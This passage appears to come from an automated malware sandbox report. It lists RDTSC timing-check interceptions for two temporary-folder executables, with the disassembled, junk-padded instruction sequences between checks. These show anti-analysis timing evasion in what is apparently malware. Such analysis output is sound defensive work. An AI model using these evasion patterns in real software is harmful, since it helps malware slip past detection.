Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5380316 second address: 538032E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F34D94219E4h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 538032E second address: 5380332 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53E0B82 second address: 53E0B88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53E0B88 second address: 53E0B99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F34D8F44CBDh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53E0B99 second address: 53E0BAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov esi, edi 0x0000000e movsx edx, si 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53E0BAB second address: 53E0C03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F34D8F44CC3h 0x00000009 or cx, 5B2Eh 0x0000000e jmp 00007F34D8F44CC9h 0x00000013 popfd 0x00000014 mov ax, A9B7h 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov dword ptr [esp], ebp 0x0000001e jmp 00007F34D8F44CBAh 0x00000023 mov ebp, esp 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 movsx ebx, cx 0x0000002b mov esi, 6AE800B5h 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53E0C03 second address: 53E0C15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F34D94219DEh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53E0C15 second address: 53E0C73 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+0Ch] 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F34D8F44CBDh 0x00000012 xor esi, 58B8EB76h 0x00000018 jmp 00007F34D8F44CC1h 0x0000001d popfd 0x0000001e pushad 0x0000001f movzx eax, di 0x00000022 mov cx, di 0x00000025 popad 0x00000026 popad 0x00000027 push dword ptr [ebp+08h] 0x0000002a jmp 00007F34D8F44CC5h 0x0000002f push 8F073FA1h 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53E0C73 second address: 53E0C77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53E0C77 second address: 53E0C8F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D8F44CC4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53E0CD2 second address: 53E0CF4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop ecx 0x00000005 mov ebx, 12F808CEh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d movzx eax, al 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F34D94219E0h 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53E0CF4 second address: 53E0D28 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F34D8F44CC1h 0x00000008 pop esi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F34D8F44CC5h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53906AF second address: 53906E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D94219E2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F34D94219E3h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53906E0 second address: 53906E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53906E6 second address: 5390712 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F34D94219DEh 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 call 00007F34D94219DDh 0x00000017 pop esi 0x00000018 mov dh, 11h 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5390712 second address: 53907BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop eax 0x00000005 mov bx, E218h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e jmp 00007F34D8F44CC7h 0x00000013 push FFFFFFFEh 0x00000015 jmp 00007F34D8F44CC6h 0x0000001a push 1A6ECFD3h 0x0000001f pushad 0x00000020 push ebx 0x00000021 pushfd 0x00000022 jmp 00007F34D8F44CBAh 0x00000027 add ax, 66D8h 0x0000002c jmp 00007F34D8F44CBBh 0x00000031 popfd 0x00000032 pop esi 0x00000033 mov edx, 0543F41Ch 0x00000038 popad 0x00000039 xor dword ptr [esp], 6C970FCBh 0x00000040 jmp 00007F34D8F44CBBh 0x00000045 push 2C094DD9h 0x0000004a jmp 00007F34D8F44CBFh 0x0000004f xor dword ptr [esp], 5AF9E3D9h 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007F34D8F44CC5h 0x0000005d rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53907BD second address: 53907EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D94219E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr fs:[00000000h] 0x0000000f jmp 00007F34D94219DEh 0x00000014 nop 0x00000015 pushad 0x00000016 mov edi, ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a mov dx, si 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53907EF second address: 5390812 instructions: 0x00000000 rdtsc 0x00000002 mov di, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push eax 0x00000009 jmp 00007F34D8F44CC1h 0x0000000e nop 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov cx, 1BA5h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5390812 second address: 5390843 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D94219DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esp, 1Ch 0x0000000c jmp 00007F34D94219E6h 0x00000011 xchg eax, ebx 0x00000012 pushad 0x00000013 movzx eax, di 0x00000016 push eax 0x00000017 push edx 0x00000018 mov eax, ebx 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5390843 second address: 539089C instructions: 0x00000000 rdtsc 0x00000002 movsx ebx, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push eax 0x00000009 pushad 0x0000000a mov cx, di 0x0000000d pushfd 0x0000000e jmp 00007F34D8F44CC9h 0x00000013 xor ch, FFFFFFB6h 0x00000016 jmp 00007F34D8F44CC1h 0x0000001b popfd 0x0000001c popad 0x0000001d xchg eax, ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 call 00007F34D8F44CC3h 0x00000026 pop esi 0x00000027 mov si, dx 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 539089C second address: 53908A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53908A3 second address: 53908BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, esi 0x00000008 jmp 00007F34D8F44CBAh 0x0000000d push eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53908BB second address: 53908BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53908BF second address: 53908E4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, esi 0x00000008 jmp 00007F34D8F44CC2h 0x0000000d xchg eax, edi 0x0000000e pushad 0x0000000f mov eax, 5FB0412Dh 0x00000014 push eax 0x00000015 push edx 0x00000016 mov ebx, eax 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53908E4 second address: 53909C9 instructions: 0x00000000 rdtsc 0x00000002 mov di, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F34D94219E7h 0x00000010 add ax, 340Eh 0x00000015 jmp 00007F34D94219E9h 0x0000001a popfd 0x0000001b mov ah, 65h 0x0000001d popad 0x0000001e xchg eax, edi 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007F34D94219E9h 0x00000026 adc ch, FFFFFFF6h 0x00000029 jmp 00007F34D94219E1h 0x0000002e popfd 0x0000002f pushfd 0x00000030 jmp 00007F34D94219E0h 0x00000035 or cx, 0818h 0x0000003a jmp 00007F34D94219DBh 0x0000003f popfd 0x00000040 popad 0x00000041 mov eax, dword ptr [76FBB370h] 0x00000046 jmp 00007F34D94219E6h 0x0000004b xor dword ptr [ebp-08h], eax 0x0000004e pushad 0x0000004f mov dx, ax 0x00000052 mov di, si 0x00000055 popad 0x00000056 xor eax, ebp 0x00000058 jmp 00007F34D94219E5h 0x0000005d nop 0x0000005e push eax 0x0000005f push edx 0x00000060 jmp 00007F34D94219DDh 0x00000065 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53909C9 second address: 5390A01 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D8F44CC1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov si, di 0x0000000e push edx 0x0000000f push esi 0x00000010 pop ebx 0x00000011 pop ecx 0x00000012 popad 0x00000013 nop 0x00000014 pushad 0x00000015 push eax 0x00000016 movsx edi, si 0x00000019 pop eax 0x0000001a popad 0x0000001b lea eax, dword ptr [ebp-10h] 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F34D8F44CBCh 0x00000025 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5390A01 second address: 5390A4E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F34D94219E1h 0x00000009 add ecx, 69D69F36h 0x0000000f jmp 00007F34D94219E1h 0x00000014 popfd 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov dword ptr fs:[00000000h], eax 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F34D94219E3h 0x00000027 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5390A4E second address: 5390A7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov esi, dword ptr [ebp+08h] 0x0000000d jmp 00007F34D8F44CC7h 0x00000012 mov eax, dword ptr [esi+10h] 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5390A7B second address: 5390A7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5390A7F second address: 5390A9A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D8F44CC7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5390A9A second address: 5390B81 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, di 0x00000006 push edi 0x00000007 pop eax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test eax, eax 0x0000000d jmp 00007F34D94219DDh 0x00000012 jne 00007F354AF50C46h 0x00000018 pushad 0x00000019 movzx esi, dx 0x0000001c push edi 0x0000001d mov ecx, 75F1CCCBh 0x00000022 pop ecx 0x00000023 popad 0x00000024 mov eax, 00000000h 0x00000029 jmp 00007F34D94219DCh 0x0000002e mov dword ptr [ebp-20h], eax 0x00000031 jmp 00007F34D94219E0h 0x00000036 mov ebx, dword ptr [esi] 0x00000038 pushad 0x00000039 movzx ecx, di 0x0000003c pushfd 0x0000003d jmp 00007F34D94219E3h 0x00000042 or cx, DF4Eh 0x00000047 jmp 00007F34D94219E9h 0x0000004c popfd 0x0000004d popad 0x0000004e mov dword ptr [ebp-24h], ebx 0x00000051 jmp 00007F34D94219DEh 0x00000056 test ebx, ebx 0x00000058 jmp 00007F34D94219E0h 0x0000005d je 00007F354AF50B0Ch 0x00000063 jmp 00007F34D94219E0h 0x00000068 cmp ebx, FFFFFFFFh 0x0000006b pushad 0x0000006c push eax 0x0000006d push edx 0x0000006e pushfd 0x0000006f jmp 00007F34D94219DCh 0x00000074 or cx, 6958h 0x00000079 jmp 00007F34D94219DBh 0x0000007e popfd 0x0000007f rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5390B81 second address: 53906AF instructions: 0x00000000 rdtsc 0x00000002 mov di, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 movzx eax, bx 0x0000000a popad 0x0000000b jmp 00007F354AA73DA5h 0x00000010 jne 00007F34D8F44CD9h 0x00000012 xor ecx, ecx 0x00000014 mov dword ptr [esi], ecx 0x00000016 mov dword ptr [esi+04h], ecx 0x00000019 mov dword ptr [esi+08h], ecx 0x0000001c mov dword ptr [esi+0Ch], ecx 0x0000001f mov dword ptr [esi+10h], ecx 0x00000022 mov dword ptr [esi+14h], ecx 0x00000025 mov ecx, dword ptr [ebp-10h] 0x00000028 mov dword ptr fs:[00000000h], ecx 0x0000002f pop ecx 0x00000030 pop edi 0x00000031 pop esi 0x00000032 pop ebx 0x00000033 mov esp, ebp 0x00000035 pop ebp 0x00000036 retn 0004h 0x00000039 nop 0x0000003a pop ebp 0x0000003b ret 0x0000003c add esi, 18h 0x0000003f pop ecx 0x00000040 cmp esi, 00A755E8h 0x00000046 jne 00007F34D8F44CA0h 0x00000048 push esi 0x00000049 call 00007F34D8F45523h 0x0000004e push ebp 0x0000004f mov ebp, esp 0x00000051 push dword ptr [ebp+08h] 0x00000054 call 00007F34DD8A8470h 0x00000059 mov edi, edi 0x0000005b pushad 0x0000005c pushad 0x0000005d mov bl, ch 0x0000005f jmp 00007F34D8F44CC7h 0x00000064 popad 0x00000065 push eax 0x00000066 push edx 0x00000067 jmp 00007F34D8F44CC6h 0x0000006c rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5390200 second address: 539020F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D94219DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 539020F second address: 539025C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 1FB4611Ah 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F34D8F44CBCh 0x00000011 push eax 0x00000012 jmp 00007F34D8F44CBBh 0x00000017 xchg eax, ebp 0x00000018 jmp 00007F34D8F44CC6h 0x0000001d mov ebp, esp 0x0000001f pushad 0x00000020 call 00007F34D8F44CBDh 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe RDTSC instruction interceptor: First address: 1FEE45 second address: 1FE700 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 ja 00007F34D94219DCh 0x0000000b popad 0x0000000c nop 0x0000000d jmp 00007F34D94219DEh 0x00000012 push dword ptr [ebp+122D0019h] 0x00000018 or dword ptr [ebp+122D1870h], ebx 0x0000001e call dword ptr [ebp+122D265Bh] 0x00000024 pushad 0x00000025 mov dword ptr [ebp+122D1870h], esi 0x0000002b xor eax, eax 0x0000002d sub dword ptr [ebp+122D2154h], ebx 0x00000033 mov edx, dword ptr [esp+28h] 0x00000037 jmp 00007F34D94219E9h 0x0000003c mov dword ptr [ebp+122D33DDh], eax 0x00000042 pushad 0x00000043 xor dl, FFFFFFB5h 0x00000046 jmp 00007F34D94219DCh 0x0000004b popad 0x0000004c mov esi, 0000003Ch 0x00000051 sub dword ptr [ebp+122D2154h], edx 0x00000057 add esi, dword ptr [esp+24h] 0x0000005b jne 00007F34D94219DCh 0x00000061 lodsw 0x00000063 je 00007F34D94219DDh 0x00000069 jnc 00007F34D94219D7h 0x0000006f add eax, dword ptr [esp+24h] 0x00000073 pushad 0x00000074 add dword ptr [ebp+122D2154h], eax 0x0000007a adc ch, FFFFFFBCh 0x0000007d popad 0x0000007e mov ebx, dword ptr [esp+24h] 0x00000082 stc 0x00000083 nop 0x00000084 jmp 00007F34D94219E3h 0x00000089 push eax 0x0000008a jng 00007F34D94219E8h 0x00000090 push eax 0x00000091 push edx 0x00000092 je 00007F34D94219D6h 0x00000098 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe RDTSC instruction interceptor: First address: 36B0F9 second address: 36B0FF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe RDTSC instruction interceptor: First address: 36B639 second address: 36B646 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 je 00007F34D94219D8h 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe RDTSC instruction interceptor: First address: 36B79F second address: 36B804 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F34D8F44CC9h 0x0000000a jnc 00007F34D8F44CB6h 0x00000010 js 00007F34D8F44CB6h 0x00000016 popad 0x00000017 pushad 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a jmp 00007F34D8F44CC5h 0x0000001f popad 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 jno 00007F34D8F44CCBh 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe RDTSC instruction interceptor: First address: 36B804 second address: 36B80D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe RDTSC instruction interceptor: First address: 36B933 second address: 36B93D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edi 0x00000007 pop edi 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe RDTSC instruction interceptor: First address: 36B93D second address: 36B941 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe RDTSC instruction interceptor: First address: 36DF7F second address: 36E00A instructions: 0x00000000 rdtsc 0x00000002 jc 00007F34D8F44CB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F34D8F44CBAh 0x00000010 jnp 00007F34D8F44CB6h 0x00000016 popad 0x00000017 popad 0x00000018 add dword ptr [esp], 4985A972h 0x0000001f sbb edi, 127BE68Ch 0x00000025 pushad 0x00000026 mov dword ptr [ebp+122D17BBh], edi 0x0000002c cmc 0x0000002d popad 0x0000002e push 00000003h 0x00000030 add dword ptr [ebp+122D1870h], ecx 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push esi 0x0000003b call 00007F34D8F44CB8h 0x00000040 pop esi 0x00000041 mov dword ptr [esp+04h], esi 0x00000045 add dword ptr [esp+04h], 0000001Dh 0x0000004d inc esi 0x0000004e push esi 0x0000004f ret 0x00000050 pop esi 0x00000051 ret 0x00000052 jmp 00007F34D8F44CC2h 0x00000057 push 00000003h 0x00000059 add esi, dword ptr [ebp+122D267Eh] 0x0000005f push 8A6C0093h 0x00000064 push ecx 0x00000065 pushad 0x00000066 jns 00007F34D8F44CB6h 0x0000006c push eax 0x0000006d push edx 0x0000006e rdtsc
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe RDTSC instruction interceptor: First address: 36E106 second address: 36E10A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe RDTSC instruction interceptor: First address: 36E10A second address: 36E10F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe RDTSC instruction interceptor: First address: 36E10F second address: 36E11F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe RDTSC instruction interceptor: First address: 36E11F second address: 36E135 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F34D8F44CBEh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe RDTSC instruction interceptor: First address: 36E135 second address: 36E213 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jmp 00007F34D94219E0h 0x0000000f mov eax, dword ptr [eax] 0x00000011 jmp 00007F34D94219E0h 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a jmp 00007F34D94219E0h 0x0000001f pop eax 0x00000020 call 00007F34D94219E5h 0x00000025 mov esi, dword ptr [ebp+122D360Dh] 0x0000002b pop esi 0x0000002c push 00000003h 0x0000002e mov edi, dword ptr [ebp+122D1F3Dh] 0x00000034 push 00000000h 0x00000036 push esi 0x00000037 mov dword ptr [ebp+122D1BF6h], ebx 0x0000003d pop edx 0x0000003e push 00000003h 0x00000040 jnp 00007F34D94219D9h 0x00000046 movzx edx, cx 0x00000049 call 00007F34D94219D9h 0x0000004e push edi 0x0000004f jmp 00007F34D94219DEh 0x00000054 pop edi 0x00000055 push eax 0x00000056 push esi 0x00000057 jmp 00007F34D94219DDh 0x0000005c pop esi 0x0000005d mov eax, dword ptr [esp+04h] 0x00000061 jnp 00007F34D94219E2h 0x00000067 jp 00007F34D94219DCh 0x0000006d mov eax, dword ptr [eax] 0x0000006f jmp 00007F34D94219E6h 0x00000074 mov dword ptr [esp+04h], eax 0x00000078 push ebx 0x00000079 push eax 0x0000007a push edx 0x0000007b jp 00007F34D94219D6h 0x00000081 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe RDTSC instruction interceptor: First address: 36E213 second address: 36E272 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 pop eax 0x00000008 push 00000000h 0x0000000a push esi 0x0000000b call 00007F34D8F44CB8h 0x00000010 pop esi 0x00000011 mov dword ptr [esp+04h], esi 0x00000015 add dword ptr [esp+04h], 0000001Dh 0x0000001d inc esi 0x0000001e push esi 0x0000001f ret 0x00000020 pop esi 0x00000021 ret 0x00000022 call 00007F34D8F44CBDh 0x00000027 pushad 0x00000028 mov dword ptr [ebp+122D2383h], ebx 0x0000002e mov dword ptr [ebp+122D22BAh], edi 0x00000034 popad 0x00000035 pop edx 0x00000036 lea ebx, dword ptr [ebp+12442E53h] 0x0000003c or dword ptr [ebp+122D2097h], edi 0x00000042 push eax 0x00000043 push ebx 0x00000044 jc 00007F34D8F44CBCh 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe RDTSC instruction interceptor: First address: 36E36C second address: 36E385 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D94219DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe RDTSC instruction interceptor: First address: 36E385 second address: 36E38F instructions: 0x00000000 rdtsc 0x00000002 jl 00007F34D8F44CB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe RDTSC instruction interceptor: First address: 36E38F second address: 36E40E instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F34D94219E5h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push 00000000h 0x0000000d push ecx 0x0000000e call 00007F34D94219D8h 0x00000013 pop ecx 0x00000014 mov dword ptr [esp+04h], ecx 0x00000018 add dword ptr [esp+04h], 00000017h 0x00000020 inc ecx 0x00000021 push ecx 0x00000022 ret 0x00000023 pop ecx 0x00000024 ret 0x00000025 mov dword ptr [ebp+122D1F1Dh], ebx 0x0000002b push 00000003h 0x0000002d mov di, si 0x00000030 push 00000000h 0x00000032 call 00007F34D94219DFh 0x00000037 mov edi, dword ptr [ebp+122D33E9h] 0x0000003d pop esi 0x0000003e mov dword ptr [ebp+122D237Eh], ebx 0x00000044 push 00000003h 0x00000046 mov esi, dword ptr [ebp+122D17C0h] 0x0000004c mov esi, dword ptr [ebp+122D3571h] 0x00000052 push 